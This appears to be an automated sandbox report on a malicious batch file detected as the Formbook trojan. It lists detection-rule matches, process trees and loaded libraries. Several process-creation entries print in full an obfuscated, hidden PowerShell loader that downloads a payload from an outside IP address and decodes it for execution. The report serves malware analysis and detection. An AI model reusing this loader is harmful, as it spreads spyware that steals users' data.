Source: 0000000D.00000002.2872962180.0000000004F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.2870539182.0000000000A50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.2350818300.00000000252F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000B.00000002.2871400550.0000000003C00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 5984, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 6528, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.troj.spyw.evad.winBAT@20/10@6/3

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Stregmaalene.Dis

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5352:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6528:120:WilError_03

Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6528
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5984
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6528

Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Doc_004024024001.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Slvtjsskabets3 = 1;$Adoptionsbevillingers='S';$Adoptionsbevillingers+='ubstrin';$Adoptionsbevillingers+='g';Function Takilman203($Prefade){$Unconversable=$Prefade.Length-$Slvtjsskabets3;For($Magnetometrical=1; $Magnetometrical -lt $Unconversable; $Magnetometrical+=(2)){$Cardsharping+=$Prefade.$Adoptionsbevillingers.Invoke($Magnetometrical, $Slvtjsskabets3);}$Cardsharping;}function Roebling($Unmotivatedly){& ($Opmuntringernes) ($Unmotivatedly);}$Glatslebnes=Takilman203 ' M o,zHiSl l,a /F5m.B0G (GWTiInId,o w.sM NfT, 1S0C.,0G;P HWSi,n,6V4 ; Px 6V4S;S .rVvB:L1D2C1N.U0 ). G.e cDk oE/U2M0B1 0P0D1,0b1F FCiSr,eWfCoFx./,1,2R1 . 0A ';$Butikshandlerne=Takilman203 ' U,s e.r - A gUeMnKt ';$Winterfeeding=Takilman203 ',h.tLt,pT:C/,/S8F7 . 1 2 1D..1 0N5N.B1 6A3S/SPSu nDkDt e,t..,hShIp. ';$Lessoning=Takilman203 '.>S ';$Opmuntringernes=Takilman203 'Ki e xP ';$Farvefabrikkerne='Overbrained';Roebling (Takilman203 'bS,eitH-SC o n.t e n.t K-DPUa,tNh, TT,: \.C.hoi s e lAi n.g sI.Gt xDt - V aOlFuSei $,FUa r v eDfFaIbjrDiDk.k.e rLn eT;S ');Roebling (Takilman203 '.i,f. T(,tSe sctu-kp aTtKh, ATF: \kC h i.sBe l iCn.gRsP..tWxStK) {EeUx i t } ;W ');$Electriceel = Takilman203 ' eEcPhOoV %,anp,pRd aGtHar% \BS t rKeCg mGa.aUlRe nRe .GDUiTsr &S&k Ae c,h.o. v$ ';Roebling (Takilman203 ',$ g lroBb aSlK: R uHbHiMcGoWn = (.cTmSdR A/ScD $IERl e,cet,r iPc.e e lF)V ');Roebling (Takilman203 ' $,gEl oAb aUlH:KGGaIrAa n.tAsT=.$AW i n.tSeErFfRe eAd,iTn g..OsHp l,i tB(S$ L ePsUsSo.nSi nDgU)N ');$Winterfeeding=$Garants[0];Roebling (Takilman203 ' $Bg l oFbsaFl :DFAiFn,gAe r vPaHnCtPeRn.= N,eIwe- OKbMjMeCc.t BSMy s.tGePmH.,NueAt,. W.eLb.C.lBiCe,nCtB ');Roebling (Takilman203 'G$NF.i nPgHe rUv aTnstNeWn . HPe a dKe rus [ $EBSu tRiDkSsAhSa n dLl,errRn e ]R=I$TG l a.t s l eSb nMe,si ');$Formatlinietegnets=Takilman203 ' FMi,nFgLe rSv a nBt.eunC.HDFoNw n lSoFaMdWFBi.lTeP(.$AWFiMnOt,eHrEfWeFe dii n,gP,E$FDPuKblbFiKnA)P ';$Formatlinietegnets=$Rubicon[1]+$Formatlinietegnets;$Dubbin=$Rubicon[0];Roebling (Takilman203 'M$ g l,oKb,aVls:,BUeSgMy.nDdPe rGk,o.nMs,t,r,uMkRt iCo n 4 1U=I(.T.e,sHtO-APPa tFhS .$BDvu.bAb.i nI) ');while (!$Begynderkonstruktion41) {Roebling (Takilman203 ',$ gSl oBb aClP:.m aTr.iJn e s,tpa toiFoFnRe rPn.e s =B$ftJr uFe ') ;Roebling $Formatlinietegnets;Roebling (Takilman203 'US.tLaSr tF- SMlBe.e,p K4D ');Roebling (Takilman203 'Y$,g lMobb a,lF: BFe g yTnKd.e rBkPo,nvsSt.rGutk.t,i,o.n 4B1,=I( T e s tA-.PSaSt,hM S$ DLuBbMb i n )I ') ;Roebling (Takilman203 ',$HgUlCo.b,a lT: CIaHr eReMnF= $MgflboAbNaOls:bt.iUl r.e.gPnLeRt,+f+B%s$SG.aDrSa nPt sB. c oIu,nDt ') ;$Winterfeeding=$Garants[$Careen];}Roebling (Takilman203 ' $,gClBo,bSaMl,:BATkHt iLoUn sDe.nShGe dke.nNs, G=s GCeUtG-SCdo n tSe,n tS $GD,u.b b,i nS ');Roebling (Takilman203 'F$AgMlMo b a.l : HSeSaUd m,e n. ,= [ S,y.sNt eEmT.,C osnNv eHrHt ] :,:,FUr o muB aSsEe 6,4GS t,r.itnfgU( $,AEkst i oAn,s,eBn,h e dUe nBs )U ');R
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Stregmaalene.Dis && echo $"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Slvtjsskabets3 = 1;$Adoptionsbevillingers='S';$Adoptionsbevillingers+='ubstrin';$Adoptionsbevillingers+='g';Function Takilman203($Prefade){$Unconversable=$Prefade.Length-$Slvtjsskabets3;For($Magnetometrical=1; $Magnetometrical -lt $Unconversable; $Magnetometrical+=(2)){$Cardsharping+=$Prefade.$Adoptionsbevillingers.Invoke($Magnetometrical, $Slvtjsskabets3);}$Cardsharping;}function Roebling($Unmotivatedly){& ($Opmuntringernes) ($Unmotivatedly);}$Glatslebnes=Takilman203 ' M o,zHiSl l,a /F5m.B0G (GWTiInId,o w.sM NfT, 1S0C.,0G;P HWSi,n,6V4 ; Px 6V4S;S .rVvB:L1D2C1N.U0 ). G.e cDk oE/U2M0B1 0P0D1,0b1F FCiSr,eWfCoFx./,1,2R1 . 0A ';$Butikshandlerne=Takilman203 ' U,s e.r - A gUeMnKt ';$Winterfeeding=Takilman203 ',h.tLt,pT:C/,/S8F7 . 1 2 1D..1 0N5N.B1 6A3S/SPSu nDkDt e,t..,hShIp. ';$Lessoning=Takilman203 '.>S ';$Opmuntringernes=Takilman203 'Ki e xP ';$Farvefabrikkerne='Overbrained';Roebling (Takilman203 'bS,eitH-SC o n.t e n.t K-DPUa,tNh, TT,: \.C.hoi s e lAi n.g sI.Gt xDt - V aOlFuSei $,FUa r v eDfFaIbjrDiDk.k.e rLn eT;S ');Roebling (Takilman203 '.i,f. T(,tSe sctu-kp aTtKh, ATF: \kC h i.sBe l iCn.gRsP..tWxStK) {EeUx i t } ;W ');$Electriceel = Takilman203 ' eEcPhOoV %,anp,pRd aGtHar% \BS t rKeCg mGa.aUlRe nRe .GDUiTsr &S&k Ae c,h.o. v$ ';Roebling (Takilman203 ',$ g lroBb aSlK: R uHbHiMcGoWn = (.cTmSdR A/ScD $IERl e,cet,r iPc.e e lF)V ');Roebling (Takilman203 ' $,gEl oAb aUlH:KGGaIrAa n.tAsT=.$AW i n.tSeErFfRe eAd,iTn g..OsHp l,i tB(S$ L ePsUsSo.nSi nDgU)N ');$Winterfeeding=$Garants[0];Roebling (Takilman203 ' $Bg l oFbsaFl :DFAiFn,gAe r vPaHnCtPeRn.= N,eIwe- OKbMjMeCc.t BSMy s.tGePmH.,NueAt,. W.eLb.C.lBiCe,nCtB ');Roebling (Takilman203 'G$NF.i nPgHe rUv aTnstNeWn . HPe a dKe rus [ $EBSu tRiDkSsAhSa n dLl,errRn e ]R=I$TG l a.t s l eSb nMe,si ');$Formatlinietegnets=Takilman203 ' FMi,nFgLe rSv a nBt.eunC.HDFoNw n lSoFaMdWFBi.lTeP(.$AWFiMnOt,eHrEfWeFe dii n,gP,E$FDPuKblbFiKnA)P ';$Formatlinietegnets=$Rubicon[1]+$Formatlinietegnets;$Dubbin=$Rubicon[0];Roebling (Takilman203 'M$ g l,oKb,aVls:,BUeSgMy.nDdPe rGk,o.nMs,t,r,uMkRt iCo n 4 1U=I(.T.e,sHtO-APPa tFhS .$BDvu.bAb.i nI) ');while (!$Begynderkonstruktion41) {Roebling (Takilman203 ',$ gSl oBb aClP:.m aTr.iJn e s,tpa toiFoFnRe rPn.e s =B$ftJr uFe ') ;Roebling $Formatlinietegnets;Roebling (Takilman203 'US.tLaSr tF- SMlBe.e,p K4D ');Roebling (Takilman203 'Y$,g lMobb a,lF: BFe g yTnKd.e rBkPo,nvsSt.rGutk.t,i,o.n 4B1,=I( T e s tA-.PSaSt,hM S$ DLuBbMb i n )I ') ;Roebling (Takilman203 ',$HgUlCo.b,a lT: CIaHr eReMnF= $MgflboAbNaOls:bt.iUl r.e.gPnLeRt,+f+B%s$SG.aDrSa nPt sB. c oIu,nDt ') ;$Winterfeeding=$Garants[$Careen];}Roebling (Takilman203 ' $,gClBo,bSaMl,:BATkHt iLoUn sDe.nShGe dke.nNs, G=s GCeUtG-SCdo n tSe,n tS $GD,u.b b,i nS ');Roebling (Takilman203 'F$AgMlMo b a.l : HSeSaUd m,e n. ,= [ S,y.sNt eEmT.,C osnNv eHrHt ] :,:,FUr o muB aSsEe 6,4GS t,r.itnfgU( $,AEkst i oAn,s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Stregmaalene.Dis && echo $"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Program Files (x86)\TEQyXgSnDatkngzhZOVCchQnHjnoGRgXuwOVmnmokOM\iqAcDmQSdyp.exe	Process created: C:\Windows\SysWOW64\AtBroker.exe "C:\Windows\SysWOW64\AtBroker.exe"
Source: unknown	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: unknown	Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: C:\Windows\SysWOW64\AtBroker.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: unknown	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Slvtjsskabets3 = 1;$Adoptionsbevillingers='S';$Adoptionsbevillingers+='ubstrin';$Adoptionsbevillingers+='g';Function Takilman203($Prefade){$Unconversable=$Prefade.Length-$Slvtjsskabets3;For($Magnetometrical=1; $Magnetometrical -lt $Unconversable; $Magnetometrical+=(2)){$Cardsharping+=$Prefade.$Adoptionsbevillingers.Invoke($Magnetometrical, $Slvtjsskabets3);}$Cardsharping;}function Roebling($Unmotivatedly){& ($Opmuntringernes) ($Unmotivatedly);}$Glatslebnes=Takilman203 ' M o,zHiSl l,a /F5m.B0G (GWTiInId,o w.sM NfT, 1S0C.,0G;P HWSi,n,6V4 ; Px 6V4S;S .rVvB:L1D2C1N.U0 ). G.e cDk oE/U2M0B1 0P0D1,0b1F FCiSr,eWfCoFx./,1,2R1 . 0A ';$Butikshandlerne=Takilman203 ' U,s e.r - A gUeMnKt ';$Winterfeeding=Takilman203 ',h.tLt,pT:C/,/S8F7 . 1 2 1D..1 0N5N.B1 6A3S/SPSu nDkDt e,t..,hShIp. ';$Lessoning=Takilman203 '.>S ';$Opmuntringernes=Takilman203 'Ki e xP ';$Farvefabrikkerne='Overbrained';Roebling (Takilman203 'bS,eitH-SC o n.t e n.t K-DPUa,tNh, TT,: \.C.hoi s e lAi n.g sI.Gt xDt - V aOlFuSei $,FUa r v eDfFaIbjrDiDk.k.e rLn eT;S ');Roebling (Takilman203 '.i,f. T(,tSe sctu-kp aTtKh, ATF: \kC h i.sBe l iCn.gRsP..tWxStK) {EeUx i t } ;W ');$Electriceel = Takilman203 ' eEcPhOoV %,anp,pRd aGtHar% \BS t rKeCg mGa.aUlRe nRe .GDUiTsr &S&k Ae c,h.o. v$ ';Roebling (Takilman203 ',$ g lroBb aSlK: R uHbHiMcGoWn = (.cTmSdR A/ScD $IERl e,cet,r iPc.e e lF)V ');Roebling (Takilman203 ' $,gEl oAb aUlH:KGGaIrAa n.tAsT=.$AW i n.tSeErFfRe eAd,iTn g..OsHp l,i tB(S$ L ePsUsSo.nSi nDgU)N ');$Winterfeeding=$Garants[0];Roebling (Takilman203 ' $Bg l oFbsaFl :DFAiFn,gAe r vPaHnCtPeRn.= N,eIwe- OKbMjMeCc.t BSMy s.tGePmH.,NueAt,. W.eLb.C.lBiCe,nCtB ');Roebling (Takilman203 'G$NF.i nPgHe rUv aTnstNeWn . HPe a dKe rus [ $EBSu tRiDkSsAhSa n dLl,errRn e ]R=I$TG l a.t s l eSb nMe,si ');$Formatlinietegnets=Takilman203 ' FMi,nFgLe rSv a nBt.eunC.HDFoNw n lSoFaMdWFBi.lTeP(.$AWFiMnOt,eHrEfWeFe dii n,gP,E$FDPuKblbFiKnA)P ';$Formatlinietegnets=$Rubicon[1]+$Formatlinietegnets;$Dubbin=$Rubicon[0];Roebling (Takilman203 'M$ g l,oKb,aVls:,BUeSgMy.nDdPe rGk,o.nMs,t,r,uMkRt iCo n 4 1U=I(.T.e,sHtO-APPa tFhS .$BDvu.bAb.i nI) ');while (!$Begynderkonstruktion41) {Roebling (Takilman203 ',$ gSl oBb aClP:.m aTr.iJn e s,tpa toiFoFnRe rPn.e s =B$ftJr uFe ') ;Roebling $Formatlinietegnets;Roebling (Takilman203 'US.tLaSr tF- SMlBe.e,p K4D ');Roebling (Takilman203 'Y$,g lMobb a,lF: BFe g yTnKd.e rBkPo,nvsSt.rGutk.t,i,o.n 4B1,=I( T e s tA-.PSaSt,hM S$ DLuBbMb i n )I ') ;Roebling (Takilman203 ',$HgUlCo.b,a lT: CIaHr eReMnF= $MgflboAbNaOls:bt.iUl r.e.gPnLeRt,+f+B%s$SG.aDrSa nPt sB. c oIu,nDt ') ;$Winterfeeding=$Garants[$Careen];}Roebling (Takilman203 ' $,gClBo,bSaMl,:BATkHt iLoUn sDe.nShGe dke.nNs, G=s GCeUtG-SCdo n tSe,n tS $GD,u.b b,i nS ');Roebling (Takilman203 'F$AgMlMo b a.l : HSeSaUd m,e n. ,= [ S,y.sNt eEmT.,C osnNv eHrHt ] :,:,FUr o muB aSsEe 6,4GS t,r.itnfgU( $,AEkst i oAn,s,eBn,h e dUe nBs )U ');R	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Stregmaalene.Dis && echo $"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Slvtjsskabets3 = 1;$Adoptionsbevillingers='S';$Adoptionsbevillingers+='ubstrin';$Adoptionsbevillingers+='g';Function Takilman203($Prefade){$Unconversable=$Prefade.Length-$Slvtjsskabets3;For($Magnetometrical=1; $Magnetometrical -lt $Unconversable; $Magnetometrical+=(2)){$Cardsharping+=$Prefade.$Adoptionsbevillingers.Invoke($Magnetometrical, $Slvtjsskabets3);}$Cardsharping;}function Roebling($Unmotivatedly){& ($Opmuntringernes) ($Unmotivatedly);}$Glatslebnes=Takilman203 ' M o,zHiSl l,a /F5m.B0G (GWTiInId,o w.sM NfT, 1S0C.,0G;P HWSi,n,6V4 ; Px 6V4S;S .rVvB:L1D2C1N.U0 ). G.e cDk oE/U2M0B1 0P0D1,0b1F FCiSr,eWfCoFx./,1,2R1 . 0A ';$Butikshandlerne=Takilman203 ' U,s e.r - A gUeMnKt ';$Winterfeeding=Takilman203 ',h.tLt,pT:C/,/S8F7 . 1 2 1D..1 0N5N.B1 6A3S/SPSu nDkDt e,t..,hShIp. ';$Lessoning=Takilman203 '.>S ';$Opmuntringernes=Takilman203 'Ki e xP ';$Farvefabrikkerne='Overbrained';Roebling (Takilman203 'bS,eitH-SC o n.t e n.t K-DPUa,tNh, TT,: \.C.hoi s e lAi n.g sI.Gt xDt - V aOlFuSei $,FUa r v eDfFaIbjrDiDk.k.e rLn eT;S ');Roebling (Takilman203 '.i,f. T(,tSe sctu-kp aTtKh, ATF: \kC h i.sBe l iCn.gRsP..tWxStK) {EeUx i t } ;W ');$Electriceel = Takilman203 ' eEcPhOoV %,anp,pRd aGtHar% \BS t rKeCg mGa.aUlRe nRe .GDUiTsr &S&k Ae c,h.o. v$ ';Roebling (Takilman203 ',$ g lroBb aSlK: R uHbHiMcGoWn = (.cTmSdR A/ScD $IERl e,cet,r iPc.e e lF)V ');Roebling (Takilman203 ' $,gEl oAb aUlH:KGGaIrAa n.tAsT=.$AW i n.tSeErFfRe eAd,iTn g..OsHp l,i tB(S$ L ePsUsSo.nSi nDgU)N ');$Winterfeeding=$Garants[0];Roebling (Takilman203 ' $Bg l oFbsaFl :DFAiFn,gAe r vPaHnCtPeRn.= N,eIwe- OKbMjMeCc.t BSMy s.tGePmH.,NueAt,. W.eLb.C.lBiCe,nCtB ');Roebling (Takilman203 'G$NF.i nPgHe rUv aTnstNeWn . HPe a dKe rus [ $EBSu tRiDkSsAhSa n dLl,errRn e ]R=I$TG l a.t s l eSb nMe,si ');$Formatlinietegnets=Takilman203 ' FMi,nFgLe rSv a nBt.eunC.HDFoNw n lSoFaMdWFBi.lTeP(.$AWFiMnOt,eHrEfWeFe dii n,gP,E$FDPuKblbFiKnA)P ';$Formatlinietegnets=$Rubicon[1]+$Formatlinietegnets;$Dubbin=$Rubicon[0];Roebling (Takilman203 'M$ g l,oKb,aVls:,BUeSgMy.nDdPe rGk,o.nMs,t,r,uMkRt iCo n 4 1U=I(.T.e,sHtO-APPa tFhS .$BDvu.bAb.i nI) ');while (!$Begynderkonstruktion41) {Roebling (Takilman203 ',$ gSl oBb aClP:.m aTr.iJn e s,tpa toiFoFnRe rPn.e s =B$ftJr uFe ') ;Roebling $Formatlinietegnets;Roebling (Takilman203 'US.tLaSr tF- SMlBe.e,p K4D ');Roebling (Takilman203 'Y$,g lMobb a,lF: BFe g yTnKd.e rBkPo,nvsSt.rGutk.t,i,o.n 4B1,=I( T e s tA-.PSaSt,hM S$ DLuBbMb i n )I ') ;Roebling (Takilman203 ',$HgUlCo.b,a lT: CIaHr eReMnF= $MgflboAbNaOls:bt.iUl r.e.gPnLeRt,+f+B%s$SG.aDrSa nPt sB. c oIu,nDt ') ;$Winterfeeding=$Garants[$Careen];}Roebling (Takilman203 ' $,gClBo,bSaMl,:BATkHt iLoUn sDe.nShGe dke.nNs, G=s GCeUtG-SCdo n tSe,n tS $GD,u.b b,i nS ');Roebling (Takilman203 'F$AgMlMo b a.l : HSeSaUd m,e n. ,= [ S,y.sNt eEmT.,C osnNv eHrHt ] :,:,FUr o muB aSsEe 6,4GS t,r.itnfgU( $,AEkst i oAn,s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Stregmaalene.Dis && echo $"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior
Source: C:\Program Files (x86)\TEQyXgSnDatkngzhZOVCchQnHjnoGRgXuwOVmnmokOM\iqAcDmQSdyp.exe	Process created: C:\Windows\SysWOW64\AtBroker.exe "C:\Windows\SysWOW64\AtBroker.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskflowdataengine.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cdp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dsreg.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
